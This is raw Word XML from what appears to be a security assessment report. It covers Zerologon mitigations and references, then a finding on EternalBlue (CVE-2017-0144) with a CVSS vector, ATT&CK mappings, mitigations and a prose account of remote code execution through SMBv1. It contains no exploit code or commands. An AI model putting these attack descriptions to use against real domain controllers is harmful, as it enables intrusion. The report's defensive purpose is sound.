          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">domain controller </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="01C6BA00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>security event logs for signs of exploitation</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7BC48A8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01C6BA0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1C6BA00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>such as Event ID 4742</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="47D8B50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713F750" w:rsidP="0D325B6E" w:rsidRDefault="0713F750" w14:paraId="53897EA9" w14:textId="18D0A1C1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>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713F750">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Windows Defender or another </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1F10A1FD">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0713F750">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ntivirus solution to detect and prevent common AD attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="7FC6F094" w14:textId="6C1ADDC9">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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4A735DCF" w:rsidP="0D325B6E" w:rsidRDefault="4A735DCF" w14:paraId="417CB17D" w14:textId="58C24BF1">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735DCF">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42D7128" w:rsidP="0D325B6E" w:rsidRDefault="542D7128" w14:paraId="2B4815E4" w14:textId="4642F8BA">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R4e99d9fee7484bcd">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="542D7128">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>CrowdStrike - Zerologon Security Advisory</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="7B61BCA5" w:rsidP="0D325B6E" w:rsidRDefault="7B61BCA5" w14:paraId="4D649A70" w14:textId="570B926B">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R8be41791a2e54294">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="7B61BCA5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Microsoft - Zerologon Security Patch</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="1873E0AA" w:rsidP="0D325B6E" w:rsidRDefault="1873E0AA" w14:paraId="3A49786C" w14:textId="19897EB3">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R3b0da8d92b444817">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="1873E0AA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>NIST - CVE-2020-1472</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="18D02787" w14:textId="64F5DF91">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="187C071E" w14:textId="45804EF8">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="29552849" w:rsidP="0D325B6E" w:rsidRDefault="29552849" w14:paraId="451FBC59" w14:textId="2413C9C5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc142299334" w:id="630023390"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="29552849">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="660000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="29552849">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C1</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc1076119505" w:id="1536852431"/>
      <w:bookmarkStart w:name="_Toc732769242" w:id="804963986"/>
      <w:bookmarkStart w:name="_Toc763247001" w:id="1964370347"/>
      <w:bookmarkStart w:name="_Toc1258489052" w:id="1607837888"/>
      <w:bookmarkStart w:name="_Toc1880131354" w:id="258890430"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="705B2CF9">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc911818177" w:id="1286274459"/>
      <w:bookmarkStart w:name="_Toc1946423770" w:id="310016471"/>
      <w:bookmarkStart w:name="_Toc864926576" w:id="3092560"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5CA39601">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:commentRangeStart w:id="898675367"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3430F90C">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1286274459"/>
      <w:bookmarkEnd w:id="310016471"/>
      <w:bookmarkEnd w:id="3092560"/>
      <w:bookmarkEnd w:id="1536852431"/>
      <w:bookmarkEnd w:id="804963986"/>
      <w:bookmarkEnd w:id="1964370347"/>
      <w:bookmarkEnd w:id="1607837888"/>
      <w:bookmarkEnd w:id="258890430"/>
      <w:commentRangeEnd w:id="898675367"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="898675367"/>
      </w:r>
      <w:bookmarkEnd w:id="63002339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07A68E4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901A650" w14:textId="6A3BCDAE">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B88A7E" w14:textId="41B6AED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A13CF4" w14:textId="7E733F1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FCD1BD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895EB62" w14:textId="3D672BC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755B371" w14:textId="6824830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514BF80C" w14:textId="7E39E646">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532B3C48" w14:textId="40960556">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446AAA9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3224F9" w14:textId="2405B3C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7C875B1" w14:textId="76AE3857">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4EC08D6"/>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B7F5CDD"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="425DA45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DCC010F" w14:textId="3AC7963B">
            <w:pPr>
              <w:spacing w:after="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21809587">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B0F77EA" w14:textId="79484056">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N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" r:id="Rb236b1a267b34e23">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AV:N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VI:</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VA:</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SI:</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SA:</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hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="0DD89B2D">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D31B273" w14:textId="5EE81BE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9D61D42" w:rsidP="0D325B6E" w:rsidRDefault="79D61D42" w14:paraId="1108461D" w14:textId="5EC8CAA6">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="79D61D42">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7DBF640" w14:textId="1FB1CAFA">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:u w:val="none"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Rba9bb46345f1468c">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0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>210</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="597F85B5">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0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Exploit</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ation of Remote Services</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="3023AEF4">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4BE8F4B6"/>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E74A1BD" w:rsidP="0D325B6E" w:rsidRDefault="1E74A1BD" w14:paraId="00084887" w14:textId="2125C1D7">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="1E74A1BD">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E74A1BD" w:rsidP="0D325B6E" w:rsidRDefault="1E74A1BD" w14:paraId="2A741AF7" w14:textId="7CCC1F11">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Re2ce41cd02794923">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="1E74A1BD">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1051: Update Software</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="1E74A1BD" w:rsidP="0D325B6E" w:rsidRDefault="1E74A1BD" w14:paraId="2802CF3E" w14:textId="5AB03804">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R3ac705edd0144be3">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="1E74A1BD">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1016: Vulnerability Scanning</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="60BC199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05BBDF1" w14:textId="2B02360A">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32B95D7" w14:textId="7A4BDB4C">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FA67312" w14:textId="2F65B5F9">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="5CA39601" w:rsidP="0D325B6E" w:rsidRDefault="5CA39601" w14:paraId="414889B8" w14:textId="04D7905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CA39601" w:rsidP="0D325B6E" w:rsidRDefault="5CA39601" w14:paraId="4B5549C9" w14:textId="0CD5304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noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5CA39601">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The host</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="59FFD310">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59FFD310">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is vulne</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="59FFD310">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rable to CVE-2017-0144 due to an outdated</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0C747C12">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version</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5C84163E">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of </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="544A993A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the Server Message Block (SMB) protocol</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2C7245A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, S</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2C7245A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MB</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2C7245A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2C7245A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="59531F3D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5CA39601">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This vulnerability allows an unauthorized attacker to gain administrative control of the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5CA39601">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domain controller</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1D5D63E2">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/windows server</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="13E6FCD4">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144138AB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>by sending specially crafted network packets to cause a</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="200616AA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="144138AB">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out-</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of-</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bou</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nds</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memory corruption error </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="494FF1EC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</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run c</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="77552BBC">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ode at an elevated </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="72C86E40">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>privilege</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5CA39601">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
